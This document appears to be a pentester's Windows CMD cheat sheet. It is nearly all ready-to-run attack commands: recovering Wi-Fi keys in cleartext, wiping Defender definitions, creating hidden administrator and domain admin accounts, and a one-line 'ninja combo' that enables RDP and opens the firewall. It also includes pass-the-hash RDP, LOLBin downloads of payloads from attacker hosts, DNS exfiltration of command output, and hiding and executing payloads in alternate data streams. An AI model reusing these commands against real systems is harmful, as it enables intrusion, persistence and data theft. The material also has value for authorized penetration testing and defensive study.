Basic CMD for Pentesters

System info

Version and Patches info

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% systeminfosysteminfo | findstr /B /C:"OS Name" /C:"OS Version" wmic qfe get Caption,Description,HotFixID,InstalledOn hostnameDRIVERQUERY 

Environment

Some env variables to highlight:

• COMPUTERNAME: Name of the computer

• TEMP/TMP: Temp folder

• USERNAME: Your username

• HOMEPATH/USERPROFILE: Home directory

• windir: C:\Windows

• OS:Windos OS

• LOGONSERVER: Name of domain controller

• USERDNSDOMAIN: Domain name to use with DNS

• USERDOMAIN: Name of the domain

nslookup %LOGONSERVER%.%USERDNSDOMAIN% 

Mounted disks

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)wmic logicaldisk get caption,description,providername

AV

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:Listsc query windefend"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Recycle Bin

dir C:\$Recycle.Bin /s /b

Processes, Services & Software

schtasks /query /fo LIST /v schtasks /query /fo LIST 2>nul | findstr TaskNameschtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEMtasklist /V tasklist /SVC net start wmic service list brief sc query dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" reg query HKEY_LOCAL_MACHINE\SOFTWARE 

Domain info

echo %USERDOMAIN% echo %USERDNSDOMAIN% echo %logonserver% set logonserver set log net groups /domain net group "domain computers" /domain net view /domain nltest /dclist:<DOMAIN> net group "Domain Controllers" /domain net group "Domain Admins" /domain net localgroup administrators /domain net user /domain net user <ACCOUNT_NAME> /domain net accounts /domain nltest /domain_trust 

Logs & Events

wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

Users & Groups

Users

whoami /all whoami /priv net users dir /b /ad "C:\Users"net user %username% net accounts qwinsta cmdkey /list net user /add [username] [password] ​runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted​logonsessions.exelogonsessions64.exe

Groups

net localgroup net localgroup Administrators net localgroup administrators [username] /add ​net group /domain net group /domain <domain_group_name> 

List sessions

Password Policy

Persistence with users

net user username password /ADD /DOMAINnet group "Domain Admins" username /ADD /DOMAIN​net user username password /ADDnet localgroup Administrators username /ADD​net localgroup "Remote Desktop Users" UserLoginName  /addnet localgroup "Debugger users" UserLoginName /addnet localgroup "Power users" UserLoginName /add

Network

Interfaces, Routes, Ports, Hosts and DNSCache

ipconfig /all route print arp -a netstat -ano type C:\WINDOWS\System32\drivers\etc\hostsipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall

netsh firewall show state netsh advfirewall firewall show rule name=allnetsh firewall show config Netsh Advfirewall show allprofiles​NetSh Advfirewall set allprofiles state off  NetSh Advfirewall set allprofiles state on  netsh firewall set opmode disable ​::How to open portsnetsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139netsh firewall add portopening TCP 3389 "Remote Desktop" ​::Enable Remote Desktopreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fnetsh firewall add portopening TCP 3389 "Remote Desktop"::netsh firewall set service remotedesktop enable ::sc config TermService start= auto ::net start Termservice ​::Enable Remote assistance:reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /fnetsh firewall set service remoteadmin enable​::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable​::Connect to RDP (using hash or password)xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

net view net view /all /domain [domainname] net view \\computer /ALL net use x: \\computer\share net share 

Wifi

netsh wlan show profile netsh wlan show profile <SSID> key=clear 

SNMP

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Network Interfaces

ARP table

Download

Bitsadmin.exe

bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

CertReq.exe

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe

certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

Desktopimgdownldr.exe

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

Esentutl.exe

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand.exe

expand \\webdav\folder\file.bat c:\ADS\file.bat

Extrac32.exe

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr.exe

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Ftp.exe

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

HH.exe http://some.url/script.ps1

Ieexec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

MpCmdRun.exe

MpCmdRun.exe -DownloadFile -url  -path  //Windows Defender executable

Replace.exe

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Excel.exe

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

squirrel.exe --download [url to package]

Update.exe

Update.exe --download [url to package]

Winword.exe

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Misc

cd cd C:\path\to\dir dir dir /a:h C:\path\to\dir dir /s /b time date shutdown /r /t 0 type <file> ​runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted​attrib +h file attrib -h file ​icacls <FILE_PATH> /t /e /p <USERNAME>:Ficacls <FILE_PATH> /e /r <USERNAME> ​xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win​​dir /r more file.txt:ads.txt powershell (Get-Content file.txt -Stream ads.txt)

Listen address ACLs

You can listen on http://+:80/Temporary_Listen_Addresses/ without being administrator.

Manual DNS shell

Attacker (Kali) must use one of these 2 options:

sudo responder -I <iface> sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> 

Victim

for /f tokens _**_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server

for /f %a in ('whoami') do nslookup %a  #Get whoamifor /f "tokens=2" %a in ('echo word1 word2') do nslookup %a  #Get word2for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c  #List folderfor /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c  #List that folderfor /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c  #Same as last one#More complex commandsfor /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i  #Same as last one

You can also redirect the output, and then read it.

whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txtfor /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i 

Calling CMD from C code

#include      ​​int main (){    int i;    i=system("net users otherAcc 0TherAcc! /add");    i=system("net localgroup administrators otherAcc /add");    return 0;}

Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)

Taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f​

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exefindstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.execertutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:tttmakecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cabprint /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exereg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.regregedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKeyexpand \\webdav\folder\file.bat c:\ADS\file.txt:file.batesentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /opowershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.execmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.batset-content - path {path to the file} - stream {name of the stream}​dir /R streams.exe <c:\path\to\file> Get-Item -Path .\fie.txt -Stream *gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'​expand c:\ads\file.txt:test.exe c:\temp\evil.exeesentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /omore < c:\ads\file.txt:test.exe​​* WMICwmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'​* Rundll32rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMainrundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dllrundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll​* Cscriptcscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"​* Wscriptwscript c:\ads\file.txt:script.vbsecho GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js​* Forfilesforfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"​* Mavinject.exec:\windows\SysWOW64\notepad.exetasklist | findstr notepadnotepad.exe                   4172 31C5CE94259D4006           2     18,476 Ktype c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"​* MSHTAmshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"(Does not work on Windows 10 1903 and newer)​* Control.execontrol.exe c:\windows\tasks\zzz:notepad_reflective_x64.dllhttps://twitter.com/bohops/status/954466315913310209​* Create service and runsc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= autosc start evilservicehttps://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/​* Powershell.exepowershell -ep bypass - < c:\temp:ttt​* Powershell.exepowershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"​* Powershell.exeInvoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}​* Regedit.exeregedit c:\ads\file.txt:regfile.reg​* Bitsadmin.exebitsadmin /create myfilebitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exebitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULLbitsadmin /RESUME myfile​* AppVLP.exeAppVLP.exe c:\windows\tracing\test.txt:ha.exe​* Cmd.execmd.exe - < fakefile.doc:reg32.bathttps://twitter.com/yeyint_mth/status/1143824979139579904​* Ftp.exeftp -s:fakefile.txt:aaaa.txthttps://github.com/sailay1996/misc-bin/blob/master/ads.md​* ieframe.dll , shdocvw.dll (ads)echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txtrundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txthttps://github.com/sailay1996/misc-bin/blob/master/ads.md​* bash.exeecho calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.shbash.exe -c $(fakefile.txt:payload.sh)https://github.com/sailay1996/misc-bin/blob/master/ads.md​* Regsvr32type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADSregsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS